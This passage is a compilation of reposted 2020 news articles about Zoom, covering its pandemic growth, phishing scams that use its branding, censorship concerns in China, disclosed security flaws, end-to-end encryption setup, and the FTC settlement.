  10. Zoom may launch an email service and calendar app to compete with Google and Microsoft The company is exploring products beyond videoconferencing Videoconferencing platform Zoom has had a blockbuster year, with its stock price rising more than 500 percent due to the unprecedented surge in remote work brought on by the coronavirus pandemic. But now the company is looking to expand beyond workplace video chat and into new territories, specifically email and calendar services, according to a new report from The Information. The company is already working on the email product, which the report states will be a web email service Zoom may begin testing as early as next year. The calendar app appears farther off and it’s unclear if development has even started. But both ideas are smart avenues for Zoom to explore, especially if companies start bringing employees back to the office and reliance on videoconferencing declines as COVID-19 vaccine distribution picks up through 2021. Zoom declined to comment for this story. Many of Zoom’s major competitors are videoconferencing platforms bundled as part of broader enterprise app suites, with the two biggest ones belonging to Microsoft with its Office 365 platform and Google with its competing Workspace bundle. Both of those platforms offer calendar, email, and videoconferencing products, so it makes sense Zoom would look to email and calendar to try to round out its offerings and make Zoom less of single-purpose platform. The Information’s report has a number of other telling signs the company is interested in building a full enterprise app suite, including job postings for “exciting chat features” and its existing integrations with other apps like Asana and Dropbox. But there is always the possibility the company decides to wait and see how the shift back to office work affects businesses and whether remote work remains a prominent factor of life well into the future. Update December 23rd, 2:58PM ET: Noted that Zoom declined to comment. Zoom may launch an email service and calendar app to compete with Google and Microsoft
  11. The Better Business Bureau warns of phishing messages with the Zoom logo that tell recipients they have a missed meeting or suspended account. A new Zoom-themed phishing attack is circulating through email, text and social media messages, aiming to steal credentials for the videoconferencing service. The Better Business Bureau (BBB) warned last week that the attack uses Zoom’s logo, and in a message tells recipients that their Zoom accounts were suspended and to click a link to reactivate; or that they missed a Zoom meeting, and to click a link to see the details and reschedule. Another recent variant of the attack has been a message welcoming some recipients to the platform and requesting they click on a link to activate the account, said the BBB. In all cases, victims are taken to a phishing landing page, where they are asked to input their Zoom credentials. “This [phishing scam] isn’t surprising, since attackers always update their phishing lures to take advantage of ongoing trends and events,” said Stu Sjouwermen with KnowBe4, on Tuesday. According to the BBB, scammers registered more than 2,449 Zoom-related domains from late April to early May. Cybercriminals and scammers are utilizing these domain names, which include the word “Zoom,” to send emails that look like they are coming from the official videoconferencing service. “No matter what kind of phishing message you receive, scammers hope you will click on the link they’ve included in their email,” according to the BBB. “These links can download malware onto your computer or lead you to a page where you are prompted to enter your login information. Entering your username and password gives scammers access to your account and any other account that uses a similar login and password combination.” The phishing scam comes amidst the wave of remote workers driven home by the coronavirus pandemic, who have come to rely on online collaboration tools like Zoom and other platforms. BBB said, with Zoom’s usage exponentially growing in 2020, these credentials are invaluable for attackers. For instance, a database shared on an underground forum in April contained more than 2,300 compromised Zoom credentials. “Naturally, this has attracted the attention of hackers and scammers,” said the BBB. “With a huge user base to target, con artists are using old tricks in new scams to try to steal your information.” Compromised Zoom credentials could give cybercriminals access to web conference calls, where sensitive files, intellectual property data and financial information are shared. Cybercriminals can also use these credentials for social-engineering purposes — ultimately leading to attacks like business email compromise efforts. Attackers can also use these types of compromised credentials to launch denial-of-service attacks, also known as “Zoom bombing.” Despite the FBI cracking down on Zoom-bombing earlier this year, the practice continues to plague Zoom users, with a recent Thanksgiving Zoom-bombing attack that was labeled “TurkeyBombing.” Potential victims can protect themselves from these types of scams by double-checking the sender’s information – as Zoom.com and Zoom.us are the only official domains for Zoom, said the BBB. Also, recipients should never click on links in unsolicited emails, they said. “Phishing scams always involve getting an unsuspecting individual to click on a link or file sent in an email that will download dangerous malware onto their computer,” they said. “If you get an unsolicited email and you aren’t sure who it really came from, never click on any links, files, or images it may contain.” Source
  12. The tech stock is getting slammed as successful coronavirus vaccine trials have investors speculating about a return to more face-to-face interaction in 2021 and beyond. What happened Shares of videoconferencing specialist Zoom Video Communications (NASDAQ:ZM) are slumping today. The decline comes in the wake of news that a COVID-19 vaccine from Pfizer and BioNTech prevented over 90% of infections in human trials including tens of thousands of volunteers. Additionally, no serious safety concerns have been identified. Some investors are betting stocks that benefited from people sheltering at home could now cool off if lockdowns ease amid a successful deployment of vaccines. So what Zoom was one of the biggest beneficiaries as consumers and workers sheltered at home. People turned to the platform to collaborate virtually, leading to skyrocketing revenue and profitability. For the three-month period ending July 31, Zoom announced a 355% year-over-year increase in revenue. On $664.5 million of revenue, the company raked in $373.4 million of free cash flow. This was up from free cash flow of $17.1 million in the year-ago quarter. Given the growth stock has soared more than 500% this year, it's not surprising to see shares selling off some as investors speculate about a return to more normalcy in 2021 and beyond. Now what Management said in its third-quarter update that it anticipated even greater fiscal fourth-quarter revenue. The company guided for record revenue between $730 million and $750 million during the period. While a slowdown in Zoom's growth story should be expected as the economy reopens, it's unclear both how quickly vaccines can be rolled out to the masses and by how much the company's growth will slow. Before the pandemic, Zoom was already notably expanding at near-triple-digit growth rates. Source
  13. BEIJING (Reuters) - Zoom Video Communications (ZM.O) has gained a following in China in recent months from users ranging from underground churches to feminists who saw it as a rare way to connect with the world beyond the reach of state censors. Some fear that window may be closing. On Friday, Zoom said it had suspended accounts of three U.S. and Hong Kong activists at Beijing’s request after they tried to commemorate the anniversary of the Tiananmen Square crackdown, but that they had since been reactivated. The U.S. company also said it was developing technology to enable it to remove or block participants based on geography. The Chinese government heavily regulates the internet, in a system widely dubbed the Great Firewall, saying this is needed to maintain social stability. All Chinese social media platforms are required to censor public posts deemed illegal. “For us, the biggest challenge has been how to reach people within China because of the firewall, and Zoom for a while looked like a ray of hope,” said U.S.-based Humanitarian China founder Zhou Fengsuo, whose account was suspended. The conferencing tool, originally designed for business use, saw Chinese user numbers surge in tandem with its global popularity amid the COVID-19 pandemic, a rare feat given how Western peers such as WhatsApp, Google Meet and Facebook are blocked in China’s cyberspace. Zoom’s mobile app has been downloaded 5.4 million times from Apple’s China store since Jan. 1, 11 times the number over the same period in 2019, according to research firm SensorTower. While most Chinese users turn to Zoom for conference calls and casual chats, some have seized the chance to discuss potentially sensitive topics, from patriotism to feminism. Some state-approved and underground churches use Zoom to hold services. “Zoom is not the only software, but we feel it’s rather more accessible,” said Xiao Meili, a feminist activist who held a Zoom talk in April on the #MeToo movement. “Before, some friends recommended Tencent conference ... but everyone would feel like you shouldn’t say anything that’s slightly sensitive,” she said, referring to a tool offered by the Chinese tech giant behind WeChat. INSIDE THE FIREWALL In March, Youth Lectures kicked off a series of Zoom talks, the first of which was led by Chinese University of Hong Kong professor Chow Po Chung, on freedom of speech in China. Chow’s mainland China account on the Twitter-like platform Weibo has been deleted multiple times. Other anonymous groups hosted lectures from a #MeToo activist and a gender-activist on their work in mid-May. New York-based Lu Pin, whose influential Feminist Voices accounts on Weibo and WeChat were shut by authorities in 2018, said Zoom was a way to connect a Chinese audience to the outside world. “You don’t have to climb the firewall, people in China and outside of China both can connect to it,” she said. There are few alternatives, she said. “This is not a multiple-choice question. If you’re a Chinese person, if you don’t use this, what will you use?” Zoom’s China users had already been subject to new constraints since last month when the company announced that free users would no longer be able host meetings, and new registrations were limited to some enterprises. Source
  14. RingCentral and Zhumu are now patched Apple informed us that it has sent out a silent security update to Macs to remove software that was automatically installed by RingCentral and Zhumu. These video conferencing apps both used technology from Zoom — they’re essentially white labels — and thus they also had Zoom’s security flaws. Specifically, they installed secondary pieces of software that could take commands from websites to open up your webcam in a video conference without your intervention. Even uninstalling those apps wouldn’t remove that secondary web server, which would mean that many users wouldn’t get the software vendors’ updates fixing the issue. That means Apple is best positioned to remove the offending software, and it is. Apple intends to fix the issue for all of Zoom’s partner apps. Yesterday, these additional issues arose from further research into Zoom’s partner apps, but the larger problem of Zoom installing a secondary web server that could potentially be insecure began with a zero-day disclosure on July 8th. Since then, Zoom itself has been scrambling to come to the right solution for users — including an about-face on whether such an update was even necessary in the first place. It ultimately decided that it was worth the update, but couldn’t remove software for users that had uninstalled its main app, which is why Apple had to step in. Apple issued its first silent patch to remove Zoom’s extra software on July 10th, and today’s update is essentially part of the same mitigation. The core issue stems from a change Zoom made to its video conferencing software to work around a security update Apple had made to Safari. Safari was recently updated in such a way that it required user approval to open up a third-party app, every time, and Zoom wanted to keep users from having to deal with that extra click. That required installing a web server that listened for calls to open up Zoom conferences. Combine that with the fact that it was common and easy for Zoom users to have their default set to have video on when joining a call, and it became possible for a malicious website with an iframe to open up a video call on your Mac with the camera on. Source
  15. Microsoft’s Skype struggles have created a Zoom moment Skype is missing out to Zoom and others during the coronavirus pandemic IfIf the coronavirus pandemic had swept across the world in 2011, everyone would have been using Skype to connect over video and voice calls. Instead, rivals like Zoom and Houseparty are having a moment of huge growth in 2020 thanks to consumers looking for Skype alternatives. In recent weeks we’ve seen people across the world sheltering at home and holding virtual yoga classes, beers with friends, and even school classes all over Zoom. It’s a unique once in a decade situation that’s highlighted Microsoft’s beleaguered Skype acquisition in a big way. Microsoft originally acquired Skype for $8.5 billion back in 2011. It was the same year that Zoom and Snapchat were founded, and Apple launched its iPhone 4. Skype had more than 100 million active users back then, and 8 million of those were paying to use the service to make and receive calls using the voice over internet protocol (VoIP). Skype was the main way consumers actually talked to each other over the internet, with video calls making up 40 percent of all Skype usage back in 2011. Skype had become so big that in 2011 The Onion joked that “Skype” would be added to the dictionary. Three years later, the verb was added to the Oxford English Dictionary, highlighting how popular the service had become. But Microsoft faced some big challenges early on to transform Skype into a profitable business and keep it relevant for consumers. Microsoft’s Skype acquisition came just as chat apps like WhatsApp, Messenger, Snapchat, and WeChat were starting to gain momentum and challenge Skype’s dominance. Surprisingly, Microsoft opted to ditch its own popular Windows Live Messenger service in favor of Skype to try and ward off competition. Microsoft had one big problem to solve early on, though. The company had acquired a service that was based on peer-to-peer (P2P) technology, which made it less efficient on mobile devices. This is where a lot of Microsoft’s Skype problems began. Microsoft transitioned Skype from these P2P networks to cloud-powered servers back in 2013, in order to capitalize on Skype integration on Windows Phone and improve its mobile apps in general. Skype also became the default messaging app for Windows 8.1 back in 2013, and even shipped as part of Microsoft’s big Kinect push for the Xbox One console in the same year. Skype also appeared on the web as part of Outlook.com in 2013. All of this was powered by Microsoft’s transition away from Skype’s traditional P2P networks, but it was messy. Skype on Windows Phone. The transition lasted years, and resulted in calls, messages, and notifications repeating on multiple devices. Skype became unreliable, at a time when rivals were continuing to offer solid alternatives that incorporated messaging functionality that actually worked and synced across devices. Instead of quickly fixing the underlying issues, Microsoft spent years trying to redesign Skype. This led to a lethal combination of an unreliable product with a user experience that changed on a monthly basis. I wrote back in 2016 that Microsoft needed to fix Skype, instead of adding in useless emoji and launching and abandoning its Qik video messaging app. Microsoft didn’t really listen, though. The company went in a completely different direction with Skype in 2017, with a design that turned the app into something that looked like Snapchat. Unsurprisingly, people weren’t happy with the design and Microsoft was forced to kill off the Snapchat-like features and redesign Skype once again a year later. During this time, Microsoft also pushed Skype for Business as the replacement for its Lync (Office Communicator) enterprise instant messaging software. Skype looked like it would power the future of Microsoft’s chat services across consumers and businesses, until Microsoft Teams arrived in 2016. Teams has quickly become Microsoft’s focus for chat and communications in recent years. The company has been aggressively pushing businesses to adopt Teams, at a time when rivals like Slack are trying to win big businesses over. Microsoft Teams isn’t just for businesses anymore, either. Just this week, Microsoft announced its Teams plan for consumers. It’s part of a bigger push for Microsoft 365 subscriptions to families and consumers. Microsoft is trying to convince consumers that Teams can be used to connect to friends and family in a group chat or through video calls, and share to-do lists, photos, and other content all in one location. Microsoft thinks people who plan trips with friends or organize book clubs and social gatherings will be interested in Teams. This Teams push has taken the spotlight off Skype in recent years, though. Microsoft has used the underlying technology it has with Skype to power its video and voice calls in Teams, while rewriting the chat and messaging experience that the company struggled to get right with Skype’s Messenger transition. All of this has now led Microsoft to throw its weight behind Teams, even for consumers. Skype isn’t likely to go away anytime soon, but it’s not Microsoft’s focus anymore. “For now, Skype will remain a great option for customers who love it and want to connect with basic chat and video calling capabilities,” says a Microsoft spokesperson in a statement to VentureBeat. “With the new features in the Microsoft Teams mobile app, we see Teams as an all in one hub for your work and life that integrates chat, video calling, [and the] ability to assign and share tasks, store and share important data with your group, [and] share your location with family and friends, whereas Skype is predominantly a chat and a video calling app platform. We have nothing more to share.” Skype’s 2014 design. Skype’s 2017 design. Skype’s 2018 design. Microsoft Teams for consumers. Microsoft said in 2015 that Skype had 300 million active monthly users. The company hasn’t updated those numbers in the tumultuous period that followed. We still don’t know exactly how many people are using Skype, but Microsoft did provide some hints this week. During a press briefing, Microsoft revealed Skype is used by 200 million people, an active user count that’s based over a period of six months and not a monthly active user count. During the coronavirus pandemic, this usage has increased to 40 million people using Skype daily, up 70 percent month-over-month. That suggests that around 23 million people were using Skype daily, before the increase in demand. Microsoft is refusing to provide monthly active user counts for Skype, most likely because the company doesn’t want any obvious comparisons to competitors or the 300 million it previously revealed in 2015 when the service was still growing. 40 million daily users is still a big number, even when chat apps like WhatsApp have since passed 2 billion users, and Telegram has exceeded 200 million monthly active users. The real question is how are rivals like Zoom, Houseparty, and even Google’s Hangouts growing during this ongoing coronavirus pandemic? Houseparty and Zoom have both exploded in growth in the UK and US. Zoom currently sits at the top of the US App Store list, and second position in the UK App Store list. Houseparty is at the top in the UK, and number three in the US. Skype sits at number 75 in the US, and number 15 in the UK. Microsoft isn’t totally losing out here though, the company’s Teams mobile app is number seven in the US and number six in the UK. Katie Baki leads a yoga class over Zoom. ”Zoom does not share any numbers around users / usage, signups, or total number of customers,” says a Zoom spokesperson in a statement to The Verge. So it’s impossible to know the true number of Zoom users right now. Some estimates suggest Zoom had close to 13 million monthly active users last month, before consumers and businesses turned to the service in large numbers. One of the many reasons consumers are flocking to Zoom and Houseparty is that they’re easy to use. Zoom users don’t need an account, it’s free to use for up to 40 minutes, and you can join meetings with just a simple link or code. Skype offers a way to create video meetings with no sign ups or downloads, but you probably didn’t even know this feature existed. Instead, Zoom’s simple app approach has won people over. That ease of use has led to criticism over Zoom privacy, and the phenomenon of “Zoombombing,” where an uninvited guest uses Zoom’s screen-sharing feature to broadcast shock videos. Houseparty is equally easy to use, but it’s facing hacking rumors that the company is strenuously denying. Houseparty says it’s “investigating indications that the recent hacking rumors were spread by a paid commercial smear campaign to harm Houseparty.” The firm is even offering to pay out $1 million to “the first individual to provide proof of such a campaign.” Even if Zoom and Houseparty won’t provide actual user numbers, it’s clear from the many stories of people using the services and anecdotal evidence that there’s some serious growth going on here. A recent App Annie report shows that Houseparty, Google Hangouts, Microsoft Teams, and Zoom are all seeing phenomenal growth for different reasons. Skype is still being used by broadcasters and in many locations worldwide, but a lot of people are turning elsewhere for video calls. Houseparty video calls. There are many reasons for Skype missing out on this key mindshare moment, but Microsoft’s missteps with Skype’s reliability and user interface are surely to blame. This is highlighted best with Skype for Windows. After years of struggling to decide between touch-friendly (Universal Windows Platform) vs. traditional desktop Skype, Microsoft is now reversing course on its Skype for Windows plans. Skype will soon migrate to an Electron-powered app, instead of UWP. It acts far more like a traditional desktop app now. “For users of the UWP app, it’s a background upgrade and we migrate your credentials, similar to what happens when updating an app on a mobile device,” says a Skype spokesperson in a statement to The Verge. “Customers will see the same Skype UI but they may see different functionality since Electron has more features than UWP.” This, alongside the Teams focus, are early signs of where Skype will end up. Microsoft wasn’t afraid of ditching the 100 million people using Windows Live Messenger years ago, and I wouldn’t be surprised to see the company try and push Skype users over to Teams in the months ahead. Like Microsoft said, “For now, Skype will remain a great option for customers who love it and want to connect with basic chat and video calling capabilities.” The “for now” part of that statement is a telling sign that Microsoft’s focus is now Teams, not Skype. Correction: Skype had around 23 million daily active users before the coronavirus pandemic, not 12 million as previously stated. We regret the error. Source: Microsoft’s Skype struggles have created a Zoom moment (The Verge)
  16. Karlston

    Why Zoom became so popular

    Why Zoom became so popular Its selling points also introduce privacy and security risks Seemingly everyone knows about Zoom now: parents, co-workers, friends, grandparents, and neighbors. The videoconferencing software company that went public last year is having a moment during the pandemic. People have flocked to the service to keep up with friends, build digital clubs, and even host weddings. However, in this time of immense growth, researchers and journalists have scrutinized the app and found multiple security and privacy risks. People are realizing the free app might actually come with the cost of giving up their personal data. The app’s main selling point, at least to the broader consumer world, is that it offers free, 40-minute conference calls with up to 100 attendees. It’s easy to use — people don’t need a login to access a meeting — and the interface is relatively intuitive. However, those same features put people at risk. Zoombombing, for one, has taken advantage of Zoom’s system of randomly generated ID access codes and lack of required passwords to join a call. People drop into Zoom calls that aren’t their own and broadcast offensive material, like pornography. One automated tool developed by security researchers can find around 100 Zoom meeting IDs in an hour and information for nearly 2,400 Zoom meetings in a single day of scans, just as an example of how easy it can be to find meetings to join. Zoom says passwords have been enabled by default since late last year, but many people still aren’t using them. That’s not the only risk with Zoom. The company also has an issue with its “Company Directory” setting that could leak user emails and photos, and Zoom confirmed to The Intercept that video calls on the app aren’t end-to-end encrypted like the company claims. The company has since announced a 90-day freeze on releasing new features and will focus on fixing privacy and security issues, it says. People continue to use Zoom because it’s easy and free, but its competitors are making moves to catch up. There are a host of alternatives, and multiple services have made certain features free or upped the number of people who can join a call. Zoom’s found massive success during a dark time for the world, and it’ll try to maintain that position, although doing so will require prioritizing user privacy and security over ease of use. Source: Why Zoom became so popular (The Verge)
  17. Zoom bug gave hackers access to any private meeting Zoom was forced to amend password policies (Image credit: Zoom Video Communications) A simple vulnerability found in the web client of video conferencing platform Zoom could have allowed hackers to listen in on any private meeting of their choosing. Identified by Tom Anthony, VP Product at SEO firm SearchPilot, the Zoom vulnerability stemmed from the absence of rate limiting on private meeting log in attempts. As Anthony explains in a recent blog post, Zoom meetings used to be protected by a 6-digit numeric password, making for a maximum of one million different permutations. This might sound like a considerable number but, using a simple Python program, a hacker could easily trial all possible passwords and brute force their way into any meeting in minutes. Meetings set to take place at regular intervals were particularly vulnerable to attack, since the password remains the same for each batch-scheduled meeting. Zoom security Zoom has experienced a sharp uptick in user numbers in recent months and currently serves over 300 million daily meeting participants. Having rocketed into public consciousness as a result of coronavirus lockdown measures and the rise of remote working, Zoom has faced significant scrutiny where security is concerned. Since March, researchers have uncovered a litany of vulnerabilities in the service - from the opportunity for credential theft to app hijacking, malicious code injection and more - forcing the company to suspend product development for a period to focus on eliminating security bugs. After verifying the brute force exploit using a crude Python program running on an AWS machine, Anthony disclosed the vulnerability on April 1, which led to the suspension of the Zoom web client on April 2 - an outage that lasted one week. During this time, Zoom implemented policy that required web client users to log into an account before joining a meeting. The company also made default passwords longer and included non-numeric characters, drastically increasing the number of possible password permutations. “We have since improved rate limiting and relaunched the web client on April 9. With these fixes, the issue was fully resolved, and no user action was required. We are not aware of any instances of this exploit being used in the wild,” Zoom explained in a statement. As Anthony notes, however, it is plausible an attacker might have infiltrated a Zoom meeting by this vector without alerting the other participants, hidden behind a generic user ID such as “iPhone” or “Home PC”. Via Bleeping Computer Zoom bug gave hackers access to any private meeting
  18. Zoom Finally Has End-to-End Encryption. Here's How to Use It You can lock down your meetings like never before—even if you have to give up a few features to do so. Photograph: Justin Paget/Getty Images Zoom has gone from startup to verb in record time, by now the de facto video call service for work-from-home meetings and cross-country happy hours alike. But while there was already plenty you could do to keep your Zoom sessions private and secure, the startup has until now lacked the most important ingredient in a truly safe online interaction: end-to-end encryption. Here’s how to use it, now that you can, and why in many cases you may not actually want to. It’s been a long road to get here. This spring, as Zoom rode the pandemic to video call ubiquity, close observers noticed that the company was calling a feature “end-to-end encrypted” when in fact it was not. Data could be encrypted, yes, but lacked the critical “end-to-end” part, which means that no one—not Zoom, not hackers, not government snoops—can access it as it travels from one user to the other. It’s the difference between your landlord keeping a key to your apartment and being able to change the locks yourself: not the end of the world in either case, but you’d want to know for sure. Especially if you don’t trust your landlord. You likely already use end-to-end encryption in some form or another. It’s on by default for iMessage and WhatsApp, a staple of encrypted messaging platforms like Signal, and an optional feature in Facebook Messenger. For video chat, your options are more sparse. Apple offers it for up to 32 participants on FaceTime, while WhatsApp allows up to eight people at a time. Signal can manage only one-on-one encrypted calls at the moment. Suffice to say, it’s a hard thing to get right. And so Zoom went on a spending spree, bringing on high-profile consultants from the world of cryptography and buying up Keybase, a company that specializes in end-to-end encryption. The result of that flurry: Zoom finally delivered on its security promises at the end of October. What Zoom launched is actually a 30-day technical preview; the company will continue to refine the offering through next year. But even in its early days, it offers a significant upgrade in protection for those who need it most. A Few Limitations There are a few caveats before deciding whether you want to fully end-to-end encrypt your Zoom calls. First is that Zoom meetings are encrypted by default regardless, just not end-to-end. Which is to say, they’re likely safe enough for most people most of the time. You should absolutely flip the switch for sensitive conversations, but otherwise, as you’ll see in a minute, it may be more trouble than it’s worth in a lot of instances. Also remember that encryption isn’t magic; the people that you’re talking to could still share whatever you say. And if any of your devices are compromised, well, you’re out of luck. Turning on end-to-end encryption comes with various inconveniences. When you have it enabled, all call participants need to call in from either the Zoom desktop or mobile apps—not a browser—or a Zoom Room. (That also means no telephone participants.) Features like cloud recording, live transcription, breakout rooms, polling, one-on-one chat, and meeting reactions aren’t compatible with end-to-end encryption, and no one can join the meeting before the host does. You also need a Zoom account to enable it, which, fair enough. But while Zoom has relented on its previous stipulation that only paying customers could access end-to-end encryption, free accounts still need a valid phone number and billing option to take advantage, which Zoom has said helps prevent abuse of the feature. Turn on End-to-End Encryption So! With all of that out of the way, here’s how to actually use Zoom’s end-to-end encryption, if it’s right for you. It’s a little different depending on whether you’re doing so for yourself, for a group, or for all the users in an account that you administer. The good news is, the directions are the same regardless of whether you’re on iOS, Android, or the desktop client. For individual users, go ahead and sign into your account on the Zoom web portal. Click Settings in the navigation panel, then Meeting. Under Security, toggle Allow use of end-to-end encryption to on. It’ll ask you to verify your choice; click Turn On when it does. (If all of this is grayed out, your admin has disabled the feature, sorry!) Then back under Security you can choose your default encryption level. Again, what Zoom calls Enhanced Encryption is fine in most cases—you’ll still be able to make specific calls end-to-end encrypted—but go with End-to-end Encryption if you’re especially scared of snoops. If you’re the admin of a group or oversee an account with multiple users, the process is the same, but you’ll see a few additional options letting you lock everyone into the settings of your choosing. Even after all of that, remember that everyone on your call needs to have end-to-end encryption enabled for the feature to work! You can confirm that you’re locked in by looking for a green shield in the upper-left corner of the screen. And that’s it! Zoom says the next phase for its end-to-end encryption offering will include better identity management and compatibility with single sign-on services, but there’s no need to wait around for those when you can start securing your meetings today. Zoom Finally Has End-to-End Encryption. Here's How to Use It
  19. The company won't have to pay a fine for the time being. Since it exploded in popularity at the start of the coronavirus pandemic, Zoom has promised to address the more glaring security and privacy issues that are a part of its video meeting software. And now the company has a regulatory incentive to do exactly that. As part of a new proposed settlement with the Federal Trade Commission (FTC) over its privacy practices, the company must establish an information security program that will see it share security audits with the agency. Zoom has also agreed to notify the FTC if it goes through a data breach, as well as implement additional security features. The main issue the FTC had with Zoom’s practices was that it misled people about its use of end-to-end (E2E) encryption. Since as far back as 2016, the company’s website has said users could secure their Zoom meetings “with end-to-end encryption. In reality, Zoom only recently started rolling out E2E encryption to video meetings. The FTC says the company’s claims gave people a false sense of security. The agency also found problems with ZoomOpener, software the company included in a July 2018 update it pushed to Mac users. ZoomOpener installed a persistent web server on your Mac that could, in certain circumstances, reinstall Zoom on your computer without your permission. “Zoom’s security practices didn’t line up with its promises, and this action will help to make sure that Zoom meetings and data about Zoom users are protected,” said Andrew Smith, the director of the FTC’s Bureau of Consumer Protection. “We take seriously the trust our users place in us every day, particularly as they rely on us to keep them connected through this unprecedented global crisis, and we continuously improve our security and privacy programs,” a spokesperson for Zoom told Engadget. “We are proud of the advancements we have made to our platform, and we have already addressed the issues identified by the FTC. Today's resolution with the FTC is in keeping with our commitment to innovating and enhancing our product as we deliver a secure video communications experience." One thing Zoom won’t have to do as part of the settlement is to pay a fine to the federal government, provided it stays out of trouble. If the FTC finds that the company hasn’t been adhering to the agreement, it faces fines of up to $43,280 for each future offense. Source
  20. New phishing attack targets Zoom users to steal Office 365 credentials A new phishing attack is targeting Microsoft 365 (formerly Office 365) users in the form of an email notification for a Zoom account suspension. The email aims to steal users’ Microsoft 365 credentials. The attack was spotted and documented by Abnormal Security (via BleepingComputer). The attack seems familiar to the one that was spotted in May, where a fake Teams email would navigate users to a duplicate Office 365 login page. With the popularity and adoption of Zoom increasing due to increased remote collaboration in the times of the pandemic, such account suspension emails spike users’ interest and warrant immediate attention. In this case, users mostly rush to correct the problem without any suspicion to avoid losing access to the tool that may hinder their work. The email for the Zoom suspension notification interestingly comes from an email address that spoofs the official domain, says the source. It mimics an automated email notification that links to a face Microsoft 365 login page, prompting users to enter their Office 365 credentials. The credentials are then compromised by hackers. The research firm adds that the phishing email has been served to more than 50,000 users. One sign that points to the illegitimacy of the email is the “zoom” branding in the email body without the capitalization of the first letter. Even if users click on the ‘Activate Account’ link in the email, the ‘Outlook’ logo or the domain of the Office 365 login page are telltale signs. The stolen credentials could be used in Business Email Compromise (BEC) scams that exploit cloud email services like Microsoft 365 and Google G Suite. New phishing attack targets Zoom users to steal Office 365 credentials
  21. Zoom isn’t actually end-to-end encrypted Zoom can still access your video meetings Photo by Smith Collection/Gado/Getty Images Zoom states on its website and in its security white paper that it supports end-to-end encryption for its meetings. But new research from The Intercept reveals that’s not exactly true. The Intercept asked a Zoom spokesperson whether video meetings that take place on the platform are end-to-end encrypted, and the spokesperson said that “Currently, it is not possible to enable E2E encryption for Zoom video meetings.” Zoom does use TLS encryption, the same standard that web browsers use to secure HTTPS websites. In practice, that means that data is encrypted between you and Zoom’s servers, similar to Gmail or Facebook content. But the term end-to-end encryption typically refers to protecting content between the users entirely with no company access at all, similar to Signal or WhatsApp. Zoom does not offer that level of encryption, making the use of “end-to-end” highly misleading. Zoom, however, denies that it’s misleading users. The company told The Intercept, “When we use the phrase ‘End to End’ in our other literature, it is in reference to the connection being encrypted from Zoom end point to Zoom end point,” and that “content is not decrypted as it transfers across the Zoom cloud.” Zoom’s in-meeting text chat does appear to support E2E; Zoom said it does not have the keys to decrypt those messages. Zoom also told The Intercept that it only collects user data that it needs to improve its service, including IP addresses, OS details, and device details, and doesn’t allow employees to access the specific content of meetings. It also said that it doesn’t sell user data of any kind. However, it’s possible that the company could be compelled to hand over meeting recordings for legal proceedings. Zoom did not respond to a request for comment. Source: Zoom isn’t actually end-to-end encrypted (The Verge)
  22. Zoom to fix security and privacy issues in 90-day feature freeze Zoom, which has come under a lot of backlash recently due to privacy and security issues, announced today that the video conferencing company is enacting a feature freeze for the next 90 days. In a blog post, CEO Eric S. Yuan stated that until the current feature set is fixed, the company won't be rolling out any new features. Moreover, in collaboration with third-party experts, it will prepare a transparency report. Yuan also revealed that the number of daily users has increased from 10 million in December to 200 million daily users, both free and paid, in March. While stating that Zoom was primarily built for enterprise customers, he explained that the company had not foreseen this massive surge in users before the coronavirus pandemic. "However, we did not design the product with the foresight that, in a matter of weeks, every person in the world would suddenly be working, studying, and socializing from home. We now have a much broader set of users who are utilizing our product in a myriad of unexpected ways, presenting us with challenges we did not anticipate when the platform was conceived." Zoom is also "enhancing" its bug bounty program. In addition to consulting with leading chief information security officials in the industry, it will be using white-box penetration testing to identify and fix loopholes in the system. Starting next week, Yuan will host a weekly webinar on Wednesdays at 10 am PT, detailing privacy and security updates for Zoom, for the next 90 days. In a recent memo sent to staff, SpaceX prohibited employees from using Zoom effective immediately, citing "significant privacy and security concerns." Source: Zoom to fix security and privacy issues in 90-day feature freeze (Neowin)
  23. The Zoom Privacy Backlash Is Only Getting Started A class action lawsuit. Rampant zoombombing. And as of today, two new zero-day vulnerabilities. Even before the pandemic, Zoom had a reputation for prioritizing ease of use over security and privacy.Photographer: Kena Betancur/Getty Images The popular video conferencing application Zoom has been having A Moment during the Covid-19 pandemic. But it's not all positive. As many people's professional and social lives move completely online, Zoom use has exploded. But with this boom has come added scrutiny from security and privacy researchers—and they keep finding more problems, including two fresh zero day vulnerabilities revealed Wednesday morning. The debate has underscored the inherent tension of balancing mainstream needs with robust security. Go too far in either direction, and valid criticism awaits. "Zoom has never been known as the most hardcore secure and private service, and there have certainly been some critical vulnerabilities, but in many cases there aren't a lot of other options," says security researcher Kenn White. "It's absolutely fair to put public pressure on Zoom to make things safer for regular users. But I wouldn't tell people 'don't use Zoom.' It's like everyone is driving a 1989 Geo and security folks are worrying about the air flow in a Ferrari." Zoom isn't the only video conferencing option, but displaced businesses, schools, and organizations have coalesced around it amid widespread shelter in place orders. It's free to use, has an intuitive interface, and can accommodate group video chats for up to 100 people. There's a lot to like. By contrast, Skype's group video chat feature only supports 50 participants for free, and live streaming options like Facebook Live don't have the immediacy and interactivity of putting everyone in a digital room together. Google offers multiple video chat options—maybe too many, if you're looking for one simple solution. At the same time, recent findings about Zoom's security and privacy failings have been legitimately concerning. Zoom's iOS app was quietly—and the company says accidentally—sending data to Facebook without notifying users, even if they had no Facebook account. The service pushed a fix late last week. Zoom also updated its privacy policy over the weekend after a report revealed that the old terms would have allowed the company to collect user information, including meeting content, and analyze it for targeted advertising or other marketing. And users have been creeped out by Zoom's attention tracking-feature, which lets the meeting host know if an attendee hasn't had the Zoom window in their screen's foreground for 30 seconds. During the pandemic, a type of online abuse known as Zoombombing, in which trolls abuse Zoom's default screen-sharing settings to take over meetings—often with racist messages or pornography—has also spiked. Zoom offers tools to protect against that sort of assault, specifically the option to password-protect your meeting, add a waiting room for pre-vetting attendees, and limit screen-sharing. Some paid and free speciality versions of the service, like Zoom for Education, also have different screen sharing defaults. But in general the service doesn't highlight these options in a way that would make them intuitive to enable. "It's as though, in suddenly shifting from the office to work from home, we didn't so much move the conference room into our kitchens as into the middle of the public square," says Riana Pfefferkorn, associate director of surveillance and cybersecurity at Stanford's Center for Internet and Society. "Enterprise platforms are now seeing the same abuse problems that we've long been used to seeing on Twitter, YouTube, Reddit, etc. Those platforms were inherently designed to let strangers contact other strangers—and yet they had to tack on anti-abuse features after-the-fact, too." Perhaps most jarring of all, the service has a security feature that it falsely described as being "end-to-end encrypted." Turning on the setting does strengthen the encryption on your video calls, but does not afford them the protection of being completely encrypted at all times in transit. Achieving full end-to-end encryption in group video calling is difficult; Apple memorably spent years finding a way to implement it for FaceTime. And for a service that can support so many streams on each call, it was always unlikely that Zoom had actually achieved this protection, 